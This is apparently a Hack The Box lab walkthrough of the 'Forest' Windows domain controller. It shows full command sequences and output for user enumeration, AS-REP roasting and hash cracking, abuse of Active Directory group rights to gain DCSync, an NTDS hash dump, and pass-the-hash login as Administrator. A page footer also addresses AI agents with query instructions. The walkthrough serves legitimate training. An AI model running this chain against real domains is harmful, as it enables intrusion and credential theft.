# HTB - Forest ## Enumeration *** **Scope** > IP Address: 10.10.10.161 **Nmap Scan** ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest] └─$ nmap -p- --min-rate 10000 $ip -Pn PORT STATE SERVICE 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 5985/tcp open wsman ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest] └─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000 PORT STATE SERVICE 88/udp open kerberos-sec 123/udp open ntp 389/udp open ldap PORT STATE SERVICE VERSION 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-08 11:55:21Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB) 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: FOREST | NetBIOS computer name: FOREST\x00 | Domain name: htb.local | Forest name: htb.local | FQDN: FOREST.htb.local |_ System time: 2024-07-08T04:55:24-07:00 | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required |_clock-skew: mean: 2h26m50s, deviation: 4h02m30s, median: 6m49s | smb2-time: | date: 2024-07-08T11:55:26 |_ start_date: 2024-07-08T11:39:10 | smb-security-mode: | account_used: | authentication_level: user | challenge_response: supported |_ message_signing: required ``` ``` * Open ports: 88 - 135 - 139 - 389 - 445 - 5985 * UDP Open ports: 88 - 123 - 389 * Services: * Versions: * Important Notes:Domain: htb.local - Windows Server 2016 Standard 14393 - FQDN: FOREST.htb.local ``` **Enumeration** **SMB** smb enumerate didn't give any useful information ```BASH ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest] └─$ smbclient -N -L //$ip Anonymous login successful Sharename Type Comment --------- ---- ------- Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 10.10.10.161 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest] └─$ crackmapexec smb $ip -u '' -p '' --shares SMB 10.10.10.161 445 FOREST [+] htb.local\: SMB 10.10.10.161 445 FOREST [-] Error enumerating shares: STATUS_ACCESS_DENIED ``` **RPC** I managed to enumerate the domain users with `rpcclient` ```bash rpcclient $> enumdomusers user:[Administrator] rid:[0x1f4] user:[Guest] rid:[0x1f5] user:[krbtgt] rid:[0x1f6] user:[DefaultAccount] rid:[0x1f7] user:[$331000-VK4ADACQNUCA] rid:[0x463] user:[SM_2c8eef0a09b545acb] rid:[0x464] user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465] user:[SM_75a538d3025e4db9a] rid:[0x466] user:[SM_681f53d4942840e18] rid:[0x467] user:[SM_1b41c9286325456bb] rid:[0x468] user:[SM_9b69f1b9d2cc45549] rid:[0x469] user:[SM_7c96b981967141ebb] rid:[0x46a] user:[SM_c75ee099d0a64c91b] rid:[0x46b] user:[SM_1ffab36a2f5f479cb] rid:[0x46c] user:[HealthMailboxc3d7722] rid:[0x46e] user:[HealthMailboxfc9daad] rid:[0x46f] user:[HealthMailboxc0a90c9] rid:[0x470] user:[HealthMailbox670628e] rid:[0x471] user:[HealthMailbox968e74d] rid:[0x472] user:[HealthMailbox6ded678] rid:[0x473] user:[HealthMailbox83d6781] rid:[0x474] user:[HealthMailboxfd87238] rid:[0x475] user:[HealthMailboxb01ac64] rid:[0x476] user:[HealthMailbox7108a4e] rid:[0x477] user:[HealthMailbox0659cc1] rid:[0x478] user:[sebastien] rid:[0x479] user:[lucinda] rid:[0x47a] user:[svc-alfresco] rid:[0x47b] user:[andy] rid:[0x47e] user:[mark] rid:[0x47f] user:[santi] rid:[0x480] ``` I have to create users list and attempt further enumeration ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest] └─$ cat user | cut -d\[ -f2 | cut -d\] -f1 | tee -a users.lst Administrator Guest krbtgt DefaultAccount $331000-VK4ADACQNUCA SM_2c8eef0a09b545acb SM_ca8c2ed5bdab4dc9b SM_75a538d3025e4db9a SM_681f53d4942840e18 SM_1b41c9286325456bb SM_9b69f1b9d2cc45549 SM_7c96b981967141ebb SM_c75ee099d0a64c91b SM_1ffab36a2f5f479cb HealthMailboxc3d7722 HealthMailboxfc9daad HealthMailboxc0a90c9 HealthMailbox670628e HealthMailbox968e74d HealthMailbox6ded678 HealthMailbox83d6781 HealthMailboxfd87238 HealthMailboxb01ac64 HealthMailbox7108a4e HealthMailbox0659cc1 sebastien lucinda svc-alfresco andy mark santi ``` ## Initial Access *** Attempting the wordlist, we get from rpc enumeration against kerberos ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest] └─$ kerbrute userenum --dc $ip -d htb.local -t 100 -o kerbrute.list ./users.lst __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.3 (9dad6e1) - 07/08/24 - Ronnie Flathers @ropnop 2024/07/08 07:57:51 > Using KDC(s): 2024/07/08 07:57:51 > 10.10.10.161:88 2024/07/08 07:57:51 > [+] VALID USERNAME: Administrator@htb.local 2024/07/08 07:57:51 > [+] VALID USERNAME: HealthMailboxc3d7722@htb.local 2024/07/08 07:57:51 > [+] VALID USERNAME: HealthMailboxc0a90c9@htb.local 2024/07/08 07:57:51 > [+] VALID USERNAME: HealthMailboxfc9daad@htb.local 2024/07/08 07:57:51 > [+] VALID USERNAME: HealthMailbox670628e@htb.local 2024/07/08 07:57:51 > [+] VALID USERNAME: HealthMailboxfd87238@htb.local 2024/07/08 07:57:51 > [+] VALID USERNAME: HealthMailbox83d6781@htb.local 2024/07/08 07:57:51 > [+] VALID USERNAME: HealthMailboxb01ac64@htb.local 2024/07/08 07:57:51 > [+] VALID USERNAME: HealthMailbox6ded678@htb.local 2024/07/08 07:57:51 > [+] VALID USERNAME: HealthMailbox968e74d@htb.local 2024/07/08 07:57:51 > [+] VALID USERNAME: HealthMailbox7108a4e@htb.local 2024/07/08 07:57:51 > [+] VALID USERNAME: lucinda@htb.local 2024/07/08 07:57:51 > [+] VALID USERNAME: HealthMailbox0659cc1@htb.local 2024/07/08 07:57:51 > [+] VALID USERNAME: sebastien@htb.local 2024/07/08 07:57:51 > [+] VALID USERNAME: santi@htb.local 2024/07/08 07:57:51 > [+] VALID USERNAME: andy@htb.local 2024/07/08 07:57:51 > [+] VALID USERNAME: mark@htb.local 2024/07/08 07:57:51 > [+] VALID USERNAME: svc-alfresco@htb.local ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest] └─$ cat kerbrute.list | awk '{print $7}' | cut -d@ -f1 | tee -a final.lst Administrator HealthMailboxc3d7722 HealthMailboxc0a90c9 HealthMailboxfc9daad HealthMailbox670628e HealthMailboxfd87238 HealthMailbox83d6781 HealthMailboxb01ac64 HealthMailbox6ded678 HealthMailbox968e74d HealthMailbox7108a4e lucinda HealthMailbox0659cc1 sebastien santi andy mark svc-alfresco ``` The next step in my mind that I will attempt `ASREP-Roasting` against the users we found ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest] └─$ impacket-GetNPUsers htb.local/ -dc-ip $ip -no-pass -request -format hashcat -usersfile final.lst $krb5asrep$23$svc-alfresco@HTB.LOCAL:a473debb50bf904fbeb3373b6f4af273$7a560ca1c022b7ac876daf73cf210638777af7e21167a0041e8366a9ca4911646d8508c752e39380dd328584e1d58e7a99a9b78c92513a91588f98930656268f97e9a794360788fad1ef12994ae12ff6666bcc105c1b9c1f998e0e0848f84201728162f3bc8e2936bec57c7f90b71aedd27d81ec7617ea476aa2074132daa142aaa819e801f16d00a3ada0c4906aab0a19bf94441eb7c51f81e8ad6c293d0f0a5ab51a50741b86bb43a5129fb4d6971f4e72ead6255d3b1933563dfe8a3709adea833a3b5e4833c7aecff174df9ab35a0a2cac8a67c7df82439db9ccba053ee8b106e019ba8 ``` I will then fire up hashcat and try to crack this hash ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest] └─$ hashcat -m 18200 asrep.hash /usr/share/wordlists/rockyou.txt $krb5asrep$23$svc-alfresco@HTB.LOCAL:a473debb50bf904fbeb3373b6f4af273$7a560ca1c022b7ac876daf73cf210638777af7e21167a0041e8366a9ca4911646d8508c752e39380dd328584e1d58e7a99a9b78c92513a91588f98930656268f97e9a794360788fad1ef12994ae12ff6666bcc105c1b9c1f998e0e0848f84201728162f3bc8e2936bec57c7f90b71aedd27d81ec7617ea476aa2074132daa142aaa819e801f16d00a3ada0c4906aab0a19bf94441eb7c51f81e8ad6c293d0f0a5ab51a50741b86bb43a5129fb4d6971f4e72ead6255d3b1933563dfe8a3709adea833a3b5e4833c7aecff174df9ab35a0a2cac8a67c7df82439db9ccba053ee8b106e019ba8f:s3rvice Session..........: hashcat Status...........: Cracked ``` ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest] └─$ evil-winrm -i $ip -u svc-alfresco -p 's3rvice' *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ``` ```bash *Evil-WinRM* PS C:\Users\svc-alfresco> type Desktop\user.txt c547a655316215e19xxxxxxxxxxxxxxxx ``` > User Flag: c547a655316215e19xxxxxxxxxxxxxxxx *** ## Privilege Escalation In active directory enumeration, I'm used to run `bloodhound.py` as soon as possible if I obtain valid credentials but this time it failed, So I uploaded `SharpHound.exe` to the machine alternatively ```PowerShell *Evil-WinRM* PS C:\Users\svc-alfresco> .\SharpHound.exe -c All --zipfilename forest 2024-07-08T05:22:16.0093511-07:00|INFORMATION|Status: 161 objects finished (+161 3.659091)/s -- Using 51 MB RAM 2024-07-08T05:22:16.0093511-07:00|INFORMATION|Enumeration finished in 00:00:44.7988005 2024-07-08T05:22:16.1343445-07:00|INFORMATION|SharpHound Enumeration Completed at 5:22 AM on 7/8/2024! Happy Graphing! ``` I will then start smb server and move the `zip` file generated to my attack host to upload it to bloodhound GUI ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest] └─$ impacket-smbserver -smb2support share . -username blind0bandit -password blind0bandit Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Config file parsed ``` Authenticate the windows box to my kali machine and then move the file ```PowerShell *Evil-WinRM* PS C:\Users\svc-alfresco> net use n: \\10.10.16.3\share /user:blind0bandit blind0bandit The command completed successfully. *Evil-WinRM* PS C:\Users\svc-alfresco> move 20240708052215_forest.zip n: ``` First, I searched for `svc-alfresco` account and click on `Reachable High Value Targets` as its value took my attention
`svc-alfresco` is a member of `Service accounts` which is a member of `PRIVILEGED IT ACCOUNTS` which is a member of `ACCOUNT OPERATORS`. It's a nested group membership :)
So, I can say that `svc-alfresco` is a member of `Account operators` group which is high privileged group. * Further enumeration about `Account operations` group in bloodhound showed that It has `GenericAll` on `EXCHANGE WINDOWS PERMISSIONS` and that group has `WriteDacl` on the domain * `GenericAll`: It means a have full control on the object and in our situation, It can be abused by adding ourselves to that group * `WriteDacl`: It means that I can modify the object discretionary Access control list `DACL` and in our situation It can be abused by granting ourselves `DCSync` rights to be able to dump `ntds` database and get the hash of administrator
we can use `PowerView.ps1` to abuse `GenericAll` & `WriteDacl` but I will use it only on `GenericAll` and use `DCSync` tool developed by `n00py` to make the attack easier {% embed url="" %} > The main reason why I didn't use `PowerView` to modify `DACL` is that I struggled solving this machine before as there is a script that reset everything to default settings and even you're fast, you might fail Clone the repository from github to `/opt` directory ```bash ┌──(kali㉿kali)-[/opt] └─$ sudo git clone https://github.com/n00py/DCSync.git ``` Use `net` command to see current group membership ```PowerShell *Evil-WinRM* PS C:\Users\svc-alfresco> net user svc-alfresco Global Group memberships *Domain Users *Service Accounts ``` Execute the following commands to add ourselves to `EXCHANGE WINDOWS PERMISSIONS` Group ```PowerShell *Evil-WinRM* PS C:\Users\svc-alfresco> upload PowerView.ps1 import-module .\PowerView.ps1 $pass = ConvertTo-SecureString -Force -AsPlainText 's3rvice' $cred = New-Object System.Management.Automation.PSCredential("htb.local\svc-alfresco", $pass) Add-DomainGroupMember -Identity 'EXCHANGE WINDOWS PERMISSIONS' -Members 'svc-alfresco' -Credential $cred ``` Verify ```PowerShell *Evil-WinRM* PS C:\Users\svc-alfresco> net user svc-alfresco Global Group memberships *Exchange Windows Perm*Domain Users *Service Accounts The command completed successfully. ``` * `DSCync.py` need some options we need to get * FQDN * distinguishedname We get the `FQDN` from Nmap Script Scan before => `Forest.htb.local` And for `distinguishedname`, we can get using PowerView ```PowerShell *Evil-WinRM* PS C:\Users\svc-alfresco> Get-DomainUser -Identity svc-alfresco | select-Object -Property distinguishedname distinguishedname ----------------- CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local ``` Now, we're ready to Start the attack. I run the tool and fire-up `crackmapexec` in one-linear cause there is a script that will reset the settings as I said before ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest] └─$ python3 /opt/DCSync/DCSync.py -dc forest.htb.local -t "CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local" htb.local\\svc-alfresco:'s3rvice'; crackmapexec smb $ip -u svc-alfresco -p 's3rvice' --ntds [*] Starting DCSync Attack against CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local [*] Initializing LDAP connection to forest.htb.local [*] Using htb.local\svc-alfresco account with password *** [*] LDAP bind OK [*] Initializing domainDumper() [*] Initializing LDAPAttack() [*] Querying domain security descriptor [*] Success! User svc-alfresco now has Replication-Get-Changes-All privileges on the domain [*] Try using DCSync with secretsdump.py and this user :) [*] Saved restore state to aclpwn-20240708-102656.restore SMB 10.10.10.161 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True) SMB 10.10.10.161 445 FOREST [+] htb.local\svc-alfresco:s3rvice SMB 10.10.10.161 445 FOREST [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied SMB 10.10.10.161 445 FOREST [+] Dumping the NTDS, this could take a while so go grab a redbull... SMB 10.10.10.161 445 FOREST htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb4xxxxxxxxxxxxxx::: SMB 10.10.10.161 445 FOREST Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB 10.10.10.161 445 FOREST krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8::: SMB 10.10.10.161 445 FOREST DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB 10.10.10.161 445 FOREST htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB 10.10.10.161 445 FOREST htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB 10.10.10.161 445 FOREST htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB 10.10.10.161 445 FOREST htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB 10.10.10.161 445 FOREST htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB 10.10.10.161 445 FOREST htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB 10.10.10.161 445 FOREST htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB 10.10.10.161 445 FOREST htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB 10.10.10.161 445 FOREST htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB 10.10.10.161 445 FOREST htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB 10.10.10.161 445 FOREST htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f::: SMB 10.10.10.161 445 FOREST htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44::: SMB 10.10.10.161 445 FOREST htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05::: SMB 10.10.10.161 445 FOREST htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a::: SMB 10.10.10.161 445 FOREST htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9::: SMB 10.10.10.161 445 FOREST htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555::: SMB 10.10.10.161 445 FOREST htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5::: SMB 10.10.10.161 445 FOREST htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff::: SMB 10.10.10.161 445 FOREST htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203::: SMB 10.10.10.161 445 FOREST htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355::: SMB 10.10.10.161 445 FOREST htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536::: SMB 10.10.10.161 445 FOREST htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc::: SMB 10.10.10.161 445 FOREST htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3::: SMB 10.10.10.161 445 FOREST htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668::: SMB 10.10.10.161 445 FOREST htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b::: SMB 10.10.10.161 445 FOREST htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7::: SMB 10.10.10.161 445 FOREST htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072::: SMB 10.10.10.161 445 FOREST FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:16b31bf83c954c24b824a6c34b81f5eb::: SMB 10.10.10.161 445 FOREST EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1::: ``` Access the machine as `SYSTEM` ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest] └─$ impacket-psexec htb.local/administrator@$ip -hashes :32693b11e6aa90eb4xxxxxxxxxxxxxx C:\Windows\system32> ``` And finally get the root flag :) ```bash C:\Windows\system32> cd C:\Users\Administrator\Desktop C:\Users\Administrator\Desktop> type root.txt 689637a422c46e0e07xxxxxxxxxxxxxxxxxxx ``` > Root Flag: 689637a422c46e0e07xxxxxxxxxxxxxxxxxxx --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://blind0bandit.gitbook.io/blog/windows-machines/easy/htb-forest.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.